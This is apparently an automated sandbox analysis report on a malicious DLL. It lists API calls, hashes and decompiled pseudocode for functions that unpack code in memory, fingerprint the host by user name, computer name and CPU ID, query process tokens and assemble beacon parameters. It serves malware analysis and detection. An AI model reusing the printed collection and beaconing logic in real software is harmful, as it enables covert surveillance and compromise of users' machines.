                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F039A
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F03A6
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F03B2
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F03C1
                                                                                                                          • task.LIBCPMTD ref: 6E2EF95F
                                                                                                                          • task.LIBCPMTD ref: 6E2EF96B
                                                                                                                          • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E2EF980
                                                                                                                          • task.LIBCPMTD ref: 6E2EF998
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2520070614-0
                                                                                                                          • Opcode ID: 75c8011f847f043b47264a8f42b196f1f00d33fb983914530ff751fd912789c6
                                                                                                                          • Instruction ID: 0f3554e01893dbeacae2ab6a00d8e5bf714f7af641b3e09a5ac8247c2286d4fe
                                                                                                                          • Opcode Fuzzy Hash: 75c8011f847f043b47264a8f42b196f1f00d33fb983914530ff751fd912789c6
                                                                                                                          • Instruction Fuzzy Hash: 96212A75D0025CEBCB05DFE4C850BDEBBB9BF48314F508569E429AB694DB346A05CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F1E2F, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F1E36
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F1E43
                                                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E2F1E80
                                                                                                                            • Part of subcall function 6E2F0FAE: _Yarn.LIBCPMT ref: 6E2F0FCD
                                                                                                                            • Part of subcall function 6E2F0FAE: _Yarn.LIBCPMT ref: 6E2F0FF1
                                                                                                                          • std::exception::exception.LIBCMTD ref: 6E2F1EA5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_std::exception::exception
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2425033533-0
                                                                                                                          • Opcode ID: 9f599ae5ba6e4c72b85829a60312cb4cb26266cc690e4f4f23c0ac55cb7ecfa5
                                                                                                                          • Instruction ID: 1f70904abe65f5a8d22576a217788624dc40db0cd044a8eb3a8020751b94b1a1
                                                                                                                          • Opcode Fuzzy Hash: 9f599ae5ba6e4c72b85829a60312cb4cb26266cc690e4f4f23c0ac55cb7ecfa5
                                                                                                                          • Instruction Fuzzy Hash: F20180B5805748DFC7208FAA948058BFFE5BF28254B808A2FE5CE87A01D7309545CB99
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E332439, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 355COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free
                                                                                                                          • String ID: -
                                                                                                                          • API String ID: 269201875-2547889144
                                                                                                                          • Opcode ID: ff176372c32bbe63ee58e99579d8badc4d8a1849a9b4cd7d7d04c74d24b0931a
                                                                                                                          • Instruction ID: 1081a546e9059cf6c094a0deb9376b3a81745d8852a5f8224b7fd0ae3c84bd37
                                                                                                                          • Opcode Fuzzy Hash: ff176372c32bbe63ee58e99579d8badc4d8a1849a9b4cd7d7d04c74d24b0931a
                                                                                                                          • Instruction Fuzzy Hash: F6C108319002B69ADB64DFE4CE50FEAB3B8FF14714F3045AAD84597185FB329A81CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2EA570, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 234COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E2F0170: _Max_value.LIBCPMTD ref: 6E2F019C
                                                                                                                            • Part of subcall function 6E2F0170: _Min_value.LIBCPMTD ref: 6E2F01C2
                                                                                                                          • allocator.LIBCONCRTD ref: 6E2EA798
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Max_valueMin_valueallocator
                                                                                                                          • String ID: 2t.n$2t.n
                                                                                                                          • API String ID: 2697025138-4282282858
                                                                                                                          • Opcode ID: b26ea5b7fc720cee6dff34bcc786ccfdbafdac2deae19289cc34da474882f705
                                                                                                                          • Instruction ID: 78e6eab7611aae2889963efc393e5de1636fcf01ba8558227938186bbf55f6a0
                                                                                                                          • Opcode Fuzzy Hash: b26ea5b7fc720cee6dff34bcc786ccfdbafdac2deae19289cc34da474882f705
                                                                                                                          • Instruction Fuzzy Hash: B1A107B5D0015D9FCB08DFE8D890AEEBBBABF88304F548959E415B7754DB34A901CB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E327A9D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 6E327B2D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorHandling__start
                                                                                                                          • String ID: pow
                                                                                                                          • API String ID: 3213639722-2276729525
                                                                                                                          • Opcode ID: 49df0c7b69f1d53f5300d01ef8be082918b0a9f3b84ad72f033ef8bbb2d9fa0b
                                                                                                                          • Instruction ID: 8097282bc89366fb5bcb6b8824dafd5a6599f32b66fa0e88b29f05b443dd97f4
                                                                                                                          • Opcode Fuzzy Hash: 49df0c7b69f1d53f5300d01ef8be082918b0a9f3b84ad72f033ef8bbb2d9fa0b
                                                                                                                          • Instruction Fuzzy Hash: 0F518A61E18253DECB8176F5C950BAB7BB8FB41750F304D78F4E1822D8EB3384959A86
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2EBA20, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: swap
                                                                                                                          • String ID: Dq6n$Dq6n
                                                                                                                          • API String ID: 630424929-2865934346
                                                                                                                          • Opcode ID: fe4135ac29e82f4b7dd3802219cc43c0494b2193611aeb934832d80036543693
                                                                                                                          • Instruction ID: 16b371194dd3bcc28199cf24f8d1eef3749034636c3fd491b62ca37e59106d83
                                                                                                                          • Opcode Fuzzy Hash: fe4135ac29e82f4b7dd3802219cc43c0494b2193611aeb934832d80036543693
                                                                                                                          • Instruction Fuzzy Hash: 30F0FE7AD0021CABCB04DFD4DD518DD777DAF55205F5048AAE80557744EB30AF14DBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Analysis Process: rundll32.exe PID: 7052 Parent PID: 7040 rundll32.exeCOMMON

                                                                                                                          Executed Functions

                                                                                                                          Function 6E37DFDA, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNEL32(00000000,000008C9,00003000,00000040,000008C9,6E37DA28), ref: 6E37E097
                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000128,00003000,00000040,6E37DA88), ref: 6E37E0CE
                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00016396,00003000,00000040), ref: 6E37E12E
                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E37E164
                                                                                                                          • VirtualProtect.KERNEL32(6E2D0000,00000000,00000004,6E37DFB9), ref: 6E37E269
                                                                                                                          • VirtualProtect.KERNEL32(6E2D0000,00001000,00000004,6E37DFB9), ref: 6E37E290
                                                                                                                          • VirtualProtect.KERNEL32(00000000,?,00000002,6E37DFB9), ref: 6E37E35D
                                                                                                                          • VirtualProtect.KERNEL32(00000000,?,00000002,6E37DFB9,?), ref: 6E37E3B3
                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E37E3CF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187584430.000000006E37D000.00000040.00020000.sdmp, Offset: 6E37D000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Virtual$Protect$Alloc$Free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2574235972-0
                                                                                                                          • Opcode ID: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
                                                                                                                          • Instruction ID: ee031c514a6d591727bb3d66cb2cb26eccd2cfbf2f132f1a8349e6477fbc51b9
                                                                                                                          • Opcode Fuzzy Hash: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
                                                                                                                          • Instruction Fuzzy Hash: 4DD18E325206219FDF22CF55CC80A9237E7FF49B91F0841A8ED4A9F34AD375AA01CB64
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CDA82B, Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E04CDA82B(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x4cdd2a8; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E04CD60B6( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x4cdd2dc ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x4cdd270, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E04CD789B(_v8 + _v8, _t64);
							}
							HeapFree( *0x4cdd270, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x4cdd270, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04CD789B(_v8 + _v8, _t64);
						}
						HeapFree( *0x4cdd270, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                                                                                                          0x04cda82b
                                                                                                                          0x04cda833
                                                                                                                          0x04cda837
                                                                                                                          0x04cda83a
                                                                                                                          0x04cda83f
                                                                                                                          0x04cda841
                                                                                                                          0x04cda846
                                                                                                                          0x04cda846
                                                                                                                          0x04cda84c
                                                                                                                          0x04cda84e
                                                                                                                          0x04cda85b
                                                                                                                          0x04cda8bc
                                                                                                                          0x04cda85d
                                                                                                                          0x04cda862
                                                                                                                          0x04cda868
                                                                                                                          0x04cda86d
                                                                                                                          0x04cda87b
                                                                                                                          0x04cda87f
                                                                                                                          0x04cda88e
                                                                                                                          0x04cda895
                                                                                                                          0x04cda89c
                                                                                                                          0x04cda89c
                                                                                                                          0x04cda8a7
                                                                                                                          0x04cda8a7
                                                                                                                          0x04cda87f
                                                                                                                          0x04cda86d
                                                                                                                          0x04cda8be
                                                                                                                          0x04cda8c4
                                                                                                                          0x04cda8ce
                                                                                                                          0x04cda8d0
                                                                                                                          0x04cda8d5
                                                                                                                          0x04cda8e4
                                                                                                                          0x04cda8e8
                                                                                                                          0x04cda8f3
                                                                                                                          0x04cda8fa
                                                                                                                          0x04cda901
                                                                                                                          0x04cda901
                                                                                                                          0x04cda90d
                                                                                                                          0x04cda90d
                                                                                                                          0x04cda8e8
                                                                                                                          0x04cda918
                                                                                                                          0x04cda91a
                                                                                                                          0x04cda91d
                                                                                                                          0x04cda91f
                                                                                                                          0x04cda922
                                                                                                                          0x04cda925
                                                                                                                          0x04cda92f
                                                                                                                          0x04cda933
                                                                                                                          0x04cda937

                                                                                                                          APIs
                                                                                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04CDA862
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04CDA879
                                                                                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04CDA886
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04CD538B), ref: 04CDA8A7
                                                                                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04CDA8CE
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04CDA8E2
                                                                                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04CDA8EF
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04CD538B), ref: 04CDA90D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3239747167-0
                                                                                                                          • Opcode ID: 23c8787f9315a118254730846ceac51263fae4518af283a067cf12ab673e6251
                                                                                                                          • Instruction ID: 45581c27e7886dc4949da03011d4e3bee4eafb4ff9430ad33c029ec364f88a61
                                                                                                                          • Opcode Fuzzy Hash: 23c8787f9315a118254730846ceac51263fae4518af283a067cf12ab673e6251
                                                                                                                          • Instruction Fuzzy Hash: B231DA75A41205EFEB20DFA9DD81B7EB7FAFB48300B11446AE505D3210E735EE059B51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD5D10, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 38%
                                                                                                                          			E04CD5D10(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E04CD75F6(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E04CD4AAB(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                                                                                          0x04cd5d1d
                                                                                                                          0x04cd5d1e
                                                                                                                          0x04cd5d1f
                                                                                                                          0x04cd5d20
                                                                                                                          0x04cd5d21
                                                                                                                          0x04cd5d25
                                                                                                                          0x04cd5d2c
                                                                                                                          0x04cd5d3b
                                                                                                                          0x04cd5d3e
                                                                                                                          0x04cd5d41
                                                                                                                          0x04cd5d48
                                                                                                                          0x04cd5d4b
                                                                                                                          0x04cd5d4e
                                                                                                                          0x04cd5d51
                                                                                                                          0x04cd5d54
                                                                                                                          0x04cd5d5f
                                                                                                                          0x04cd5d61
                                                                                                                          0x04cd5d6a
                                                                                                                          0x04cd5d72
                                                                                                                          0x04cd5d74
                                                                                                                          0x04cd5d86
                                                                                                                          0x04cd5d90
                                                                                                                          0x04cd5d94
                                                                                                                          0x04cd5da3
                                                                                                                          0x04cd5da7
                                                                                                                          0x04cd5db0
                                                                                                                          0x04cd5db8
                                                                                                                          0x04cd5db8
                                                                                                                          0x04cd5dba
                                                                                                                          0x04cd5dba
                                                                                                                          0x04cd5dc2
                                                                                                                          0x04cd5dc8
                                                                                                                          0x04cd5dcc
                                                                                                                          0x04cd5dcc
                                                                                                                          0x04cd5dd7

                                                                                                                          APIs
                                                                                                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04CD5D57
                                                                                                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04CD5D6A
                                                                                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04CD5D86
                                                                                                                            • Part of subcall function 04CD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,04CD4F70), ref: 04CD7602
                                                                                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04CD5DA3
                                                                                                                          • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04CD5DB0
                                                                                                                          • NtClose.NTDLL(?), ref: 04CD5DC2
                                                                                                                          • NtClose.NTDLL(00000000), ref: 04CD5DCC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2575439697-0
                                                                                                                          • Opcode ID: 1c3dfc327eb82d45eedf5905950efa97d6127f10a0be6536e090330ac2574b07
                                                                                                                          • Instruction ID: 16b42c5753e69a0df7e4cef208741adab24c4dd77046a74cd35dbd13cf5968ec
                                                                                                                          • Opcode Fuzzy Hash: 1c3dfc327eb82d45eedf5905950efa97d6127f10a0be6536e090330ac2574b07
                                                                                                                          • Instruction Fuzzy Hash: 7521E67A901228BBDB01DF95CD45EDEBFBEEF48750F104026FA05E6110D7719A44DBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2E5600, Relevance: 9.4, APIs: 4, Strings: 1, Instructions: 623COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,000008BB), ref: 6E2E5696
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,6E37B7A0,000008BB), ref: 6E2E576F
                                                                                                                            • Part of subcall function 6E2E72B0: task.LIBCPMTD ref: 6E2E7352
                                                                                                                            • Part of subcall function 6E2EBA20: swap.LIBCPMTD ref: 6E2EBA39
                                                                                                                          • CreateSemaphoreW.KERNEL32(00000000,00000007,00000007,00000000,6E367144,?,?,?,?,?,00000000), ref: 6E2E5950
                                                                                                                          • std::locale::locale.LIBCPMTD ref: 6E2E59D8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: FileModuleName$CreateSemaphorestd::locale::localeswaptask
                                                                                                                          • String ID: ?
                                                                                                                          • API String ID: 756721536-1684325040
                                                                                                                          • Opcode ID: 6f85f5dcef35b710a456ca4966ad4755d77379066af31afc9f14c1dbe23b4efd
                                                                                                                          • Instruction ID: 09b3f38f99fddfd30bda2fb762b5b80dca631554444c509bd5469c0b50b8b9ad
                                                                                                                          • Opcode Fuzzy Hash: 6f85f5dcef35b710a456ca4966ad4755d77379066af31afc9f14c1dbe23b4efd
                                                                                                                          • Instruction Fuzzy Hash: 295293B0900538CFCF08CFA8D990BAD77BAFB8A305F6089A9D54597794D738D849DB48
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD44A4, Relevance: 34.7, APIs: 23, Instructions: 201memorystringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 66%
                                                                                                                          			E04CD44A4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				void* _t38;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x4cdd018; // 0x14d7c998
				asm("bswap eax");
				_t27 =  *0x4cdd014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x4cdd010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x4cdd00c; // 0x81762942
				asm("bswap eax");
				_t30 =  *0x4cdd2e0; // 0xbda5a8
				_t3 = _t30 + 0x4cde633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3f874, _t29, _t28, _t27, _t26,  *0x4cdd02c,  *0x4cdd004, _t25);
				_t33 = E04CD5B60();
				_t34 =  *0x4cdd2e0; // 0xbda5a8
				_t4 = _t34 + 0x4cde673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37; // executed
				_t38 = E04CD1BBF(_t91); // executed
				_t96 = _t38;
				if(_t96 != 0) {
					_t83 =  *0x4cdd2e0; // 0xbda5a8
					_t6 = _t83 + 0x4cde8cc; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x4cdd270, 0, _t96);
				}
				_t97 = E04CD137A();
				if(_t97 != 0) {
					_t78 =  *0x4cdd2e0; // 0xbda5a8
					_t8 = _t78 + 0x4cde8d4; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x4cdd270, 0, _t97);
				}
				_t98 =  *0x4cdd364; // 0x58b95b0
				_a32 = E04CD3857(0x4cdd00a, _t98 + 4);
				_t42 =  *0x4cdd308; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x4cdd2e0; // 0xbda5a8
					_t11 = _t74 + 0x4cde8ae; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x4cdd304; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x4cdd2e0; // 0xbda5a8
					_t13 = _t71 + 0x4cde885; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t46 = RtlAllocateHeap( *0x4cdd270, 0, 0x800); // executed
					_t100 = _t46;
					if(_t100 != 0) {
						E04CDA811(GetTickCount());
						_t50 =  *0x4cdd364; // 0x58b95b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x4cdd364; // 0x58b95b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x4cdd364; // 0x58b95b0
						_t103 = E04CD1974(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x4cdc2ac);
							_push(_t103);
							_t62 = E04CD38CA();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E04CD2A4E(0xffffffffffffffff, _t100, _v28, _v24); // executed
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E04CD47D5();
								}
								HeapFree( *0x4cdd270, 0, _v44);
							}
							HeapFree( *0x4cdd270, 0, _t103);
						}
						RtlFreeHeap( *0x4cdd270, 0, _t100); // executed
					}
					HeapFree( *0x4cdd270, 0, _a24);
				}
				RtlFreeHeap( *0x4cdd270, 0, _t105); // executed
				return _a4;
			}


















































                                                                                                                          0x04cd44a4
                                                                                                                          0x04cd44a4
                                                                                                                          0x04cd44a4
                                                                                                                          0x04cd44a9
                                                                                                                          0x04cd44af
                                                                                                                          0x04cd44b9
                                                                                                                          0x04cd44bb
                                                                                                                          0x04cd44bb
                                                                                                                          0x04cd44c8
                                                                                                                          0x04cd44d3
                                                                                                                          0x04cd44d6
                                                                                                                          0x04cd44e1
                                                                                                                          0x04cd44e4
                                                                                                                          0x04cd44e9
                                                                                                                          0x04cd44ec
                                                                                                                          0x04cd44f1
                                                                                                                          0x04cd44f4
                                                                                                                          0x04cd4500
                                                                                                                          0x04cd450d
                                                                                                                          0x04cd450f
                                                                                                                          0x04cd4515
                                                                                                                          0x04cd451a
                                                                                                                          0x04cd4525
                                                                                                                          0x04cd4527
                                                                                                                          0x04cd452a
                                                                                                                          0x04cd452c
                                                                                                                          0x04cd4531
                                                                                                                          0x04cd4535
                                                                                                                          0x04cd4537
                                                                                                                          0x04cd453c
                                                                                                                          0x04cd4548
                                                                                                                          0x04cd454a
                                                                                                                          0x04cd4556
                                                                                                                          0x04cd4558
                                                                                                                          0x04cd4558
                                                                                                                          0x04cd4563
                                                                                                                          0x04cd4567
                                                                                                                          0x04cd4569
                                                                                                                          0x04cd456e
                                                                                                                          0x04cd457a
                                                                                                                          0x04cd457c
                                                                                                                          0x04cd4588
                                                                                                                          0x04cd458a
                                                                                                                          0x04cd458a
                                                                                                                          0x04cd4590
                                                                                                                          0x04cd45a3
                                                                                                                          0x04cd45a7
                                                                                                                          0x04cd45ae
                                                                                                                          0x04cd45b1
                                                                                                                          0x04cd45b6
                                                                                                                          0x04cd45c1
                                                                                                                          0x04cd45c3
                                                                                                                          0x04cd45c6
                                                                                                                          0x04cd45c6
                                                                                                                          0x04cd45c8
                                                                                                                          0x04cd45cf
                                                                                                                          0x04cd45d2
                                                                                                                          0x04cd45d7
                                                                                                                          0x04cd45e1
                                                                                                                          0x04cd45e3
                                                                                                                          0x04cd45eb
                                                                                                                          0x04cd45fe
                                                                                                                          0x04cd4604
                                                                                                                          0x04cd4608
                                                                                                                          0x04cd4614
                                                                                                                          0x04cd4619
                                                                                                                          0x04cd4622
                                                                                                                          0x04cd4633
